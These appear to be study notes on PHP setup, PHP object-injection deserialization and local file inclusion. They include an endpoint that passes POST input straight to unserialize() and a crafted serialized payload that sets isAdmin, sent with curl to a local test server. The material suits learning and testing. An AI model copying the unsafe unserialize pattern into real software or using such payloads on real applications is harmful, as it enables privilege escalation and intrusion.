Interactive
$ pkg install php73-readline $ php -a php >
Composer
Packagist – The PHP Package Repository
$ curl -sS https://getcomposer.org/installer | php Some settings on your machine make Composer unable to work properly. Make sure that you fix the issues listed below and run this script again: The phar extension is missing. Install it or recompile php without --disable-phar The filter extension is missing. Install it or recompile php without --disable-filter $ pkg install php73-phar $ pkg install php73-filter
Serialization / Unserialization
- Object Injection
- Pop Chains
- Object Relation Mapper
- LFI Scripts
Intro to PHP Deserialization / Object Injection
Advanced PHP Deserialization – Phar Files
<?php
class User {
public $username;
public $isAdmin;
public function PrintData() {
if ($this->isAdmin) {
echo $this->username . " is an admin\n";
} else {
echo $this->username . " is NOT an admin\n";
}
}
}
$obj = new User();
$obj->username = 'ippsec';
$obj->isAdmin = True;
echo serialize($obj);
?>
Type:Length:Name of class/variable:How many items in the object
O:4:"User":2:{s:8:"username";s:6:"ippsec";s:7:"isAdmin";b:1;}
Type
O = Object
s = String
b = Boolean
$obj = unserialize($_POST['ippsec']); $obj->PrintData();
$ php -S 127.0.0.1:8070 &
[1] 1245
PHP 7.3.26 Development Server started at Thu Jan 14 11:56:06 2021
Listening on http://127.0.0.1:8070
Document root is /usr/home/andreas/composer
Press Ctrl-C to quit.
$ curl -XPOST -d 'ippsec=O:4:"User":2:{s:8:"username";s:6:"ippsec";s:7:"isAdmin";b:1;}' localhost:8070/test.php
[Thu Jan 14 12:01:17 2021] 127.0.0.1:38066 [200]: /test.php
ippsec is an admin
Local File Inclusion (LFI)
Local File Inclusion (LFI) — Web Application Penetration Testing
Local File Inclusion (LFI) allows an attacker to include files on a server through the web browser. This vulnerability exists when a web application includes a file without correctly sanitising the input, allowing and attacker to manipulate the input and inject path traversal characters and include other files from the web server.